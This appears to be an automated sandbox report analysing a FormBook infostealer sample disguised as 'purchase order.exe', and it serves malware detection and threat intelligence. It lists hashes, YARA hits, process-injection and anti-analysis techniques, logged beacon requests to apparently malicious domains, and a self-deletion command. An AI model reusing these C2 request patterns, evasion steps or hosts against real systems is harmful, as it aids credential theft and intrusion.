Analysis Report purchase order.exe

Overview

General Information

Sample Name: purchase order.exe
Analysis ID: 323034
MD5: 975187a07455d3cbf38ec878d893b490
SHA1: af8ddbf775cdb9dbd3776f717c192094202127be
SHA256: 009d9a0f6fafa91b750271413fef5771a4ce5855a59c0e6c16c85eb7de08e52b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: purchase order.exe Virustotal: Detection: 28%
Source: purchase order.exe ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: purchase order.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.purchase order.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A2A760
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A2A755
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A21CEC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A21CF8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.6:49750
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1 Host: www.rettexo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1 Host: www.makgxoimisitzer.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1 Host: www.purehempbotanicalsinfo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: Joe Sandbox View ASN Name: UNMETEREDCA
Source: Joe Sandbox View ASN Name: TOTAL-SERVER-SOLUTIONSUS
Source: unknown DNS traffic detected: queries for: g.msn.com

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: purchase order.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1015C NtQueryInformationProcess, 0_2_02B1015C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B10B88 NtQueryInformationProcess, 0_2_02B10B88
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041A050 NtClose, 2_2_0041A050
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041A100 NtAllocateVirtualMemory, 2_2_0041A100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419F20 NtCreateFile, 2_2_00419F20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419FD0 NtReadFile, 2_2_00419FD0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419FCA NtReadFile, 2_2_00419FCA
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_017E9910
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E99A0 NtCreateSection,LdrInitializeThunk, 2_2_017E99A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_017E9860
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9840 NtDelayExecution,LdrInitializeThunk, 2_2_017E9840
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_017E98F0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A50 NtCreateFile,LdrInitializeThunk, 2_2_017E9A50
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A20 NtResumeThread,LdrInitializeThunk, 2_2_017E9A20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_017E9A00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9540 NtReadFile,LdrInitializeThunk, 2_2_017E9540
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E95D0 NtClose,LdrInitializeThunk, 2_2_017E95D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9710 NtQueryInformationToken,LdrInitializeThunk, 2_2_017E9710
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_017E97A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9780 NtMapViewOfSection,LdrInitializeThunk, 2_2_017E9780
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_017E9660
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_017E96E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9950 NtQueueApcThread, 2_2_017E9950
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E99D0 NtCreateProcessEx, 2_2_017E99D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EB040 NtSuspendThread, 2_2_017EB040
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9820 NtEnumerateKey, 2_2_017E9820
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E98A0 NtWriteVirtualMemory, 2_2_017E98A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9B00 NtSetValueKey, 2_2_017E9B00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA3B0 NtGetContextThread, 2_2_017EA3B0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A10 NtQuerySection, 2_2_017E9A10
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A80 NtOpenDirectoryObject, 2_2_017E9A80
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9560 NtWriteFile, 2_2_017E9560
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EAD30 NtSetContextThread, 2_2_017EAD30
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9520 NtWaitForSingleObject, 2_2_017E9520
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E95F0 NtQueryInformationFile, 2_2_017E95F0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA770 NtOpenThread, 2_2_017EA770
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9770 NtSetInformationFile, 2_2_017E9770
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9760 NtOpenProcess, 2_2_017E9760
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9730 NtQueryVirtualMemory, 2_2_017E9730
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA710 NtOpenProcessToken, 2_2_017EA710
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9FE0 NtCreateMutant, 2_2_017E9FE0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9670 NtQueryInformationProcess, 2_2_017E9670
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9650 NtQueryValueKey, 2_2_017E9650
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9610 NtEnumerateValueKey, 2_2_017E9610
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E96D0 NtCreateKey, 2_2_017E96D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048995D0 NtClose,LdrInitializeThunk, 5_2_048995D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899540 NtReadFile,LdrInitializeThunk, 5_2_04899540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048996D0 NtCreateKey,LdrInitializeThunk, 5_2_048996D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048996E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_048996E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899650 NtQueryValueKey,LdrInitializeThunk, 5_2_04899650
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04899660
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04899780
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04899FE0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04899710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899840 NtDelayExecution,LdrInitializeThunk, 5_2_04899840
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04899860
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048999A0 NtCreateSection,LdrInitializeThunk, 5_2_048999A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04899910
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A50 NtCreateFile,LdrInitializeThunk, 5_2_04899A50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048995F0 NtQueryInformationFile, 5_2_048995F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899520 NtWaitForSingleObject, 5_2_04899520
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489AD30 NtSetContextThread, 5_2_0489AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899560 NtWriteFile, 5_2_04899560
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899610 NtEnumerateValueKey, 5_2_04899610
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899670 NtQueryInformationProcess, 5_2_04899670
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048997A0 NtUnmapViewOfSection, 5_2_048997A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A710 NtOpenProcessToken, 5_2_0489A710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899730 NtQueryVirtualMemory, 5_2_04899730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899760 NtOpenProcess, 5_2_04899760
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A770 NtOpenThread, 5_2_0489A770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899770 NtSetInformationFile, 5_2_04899770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048998A0 NtWriteVirtualMemory, 5_2_048998A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048998F0 NtReadVirtualMemory, 5_2_048998F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899820 NtEnumerateKey, 5_2_04899820
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489B040 NtSuspendThread, 5_2_0489B040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048999D0 NtCreateProcessEx, 5_2_048999D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899950 NtQueueApcThread, 5_2_04899950
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A80 NtOpenDirectoryObject, 5_2_04899A80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A00 NtProtectVirtualMemory, 5_2_04899A00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A10 NtQuerySection, 5_2_04899A10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A20 NtResumeThread, 5_2_04899A20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A3B0 NtGetContextThread, 5_2_0489A3B0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899B00 NtSetValueKey, 5_2_04899B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063A050 NtClose, 5_2_0063A050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063A100 NtAllocateVirtualMemory, 5_2_0063A100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639F20 NtCreateFile, 5_2_00639F20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639FD0 NtReadFile, 5_2_00639FD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639FCA NtReadFile, 5_2_00639FCA
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0485B150 appears 48 times
Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 017AB150 appears 35 times
Sample file is different than original file name gathered from version info
Source: purchase order.exe, 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKedermister.dllT vs purchase order.exe
Source: purchase order.exe, 00000000.00000000.333598877.00000000009B0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
Source: purchase order.exe, 00000002.00000000.353042240.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs purchase order.exe
Source: purchase order.exe Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Yara signature match
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@6/3
Source: C:\Users\user\Desktop\purchase order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
Source: purchase order.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\purchase order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: purchase order.exe Virustotal: Detection: 28%
Source: purchase order.exe ReversingLabs: Detection: 19%
Source: unknown Process created: C:\Users\user\Desktop\purchase order.exe 'C:\Users\user\Desktop\purchase order.exe'
Source: unknown Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
Source: unknown Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
Source: C:\Users\user\Desktop\purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\purchase order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: purchase order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: purchase order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: purchase order.exe, msdt.exe
Source: Binary string: msdt.pdb source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A5252 push ecx; iretd 0_2_063A5253
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A2B1C push es; iretd 0_2_063A2B22
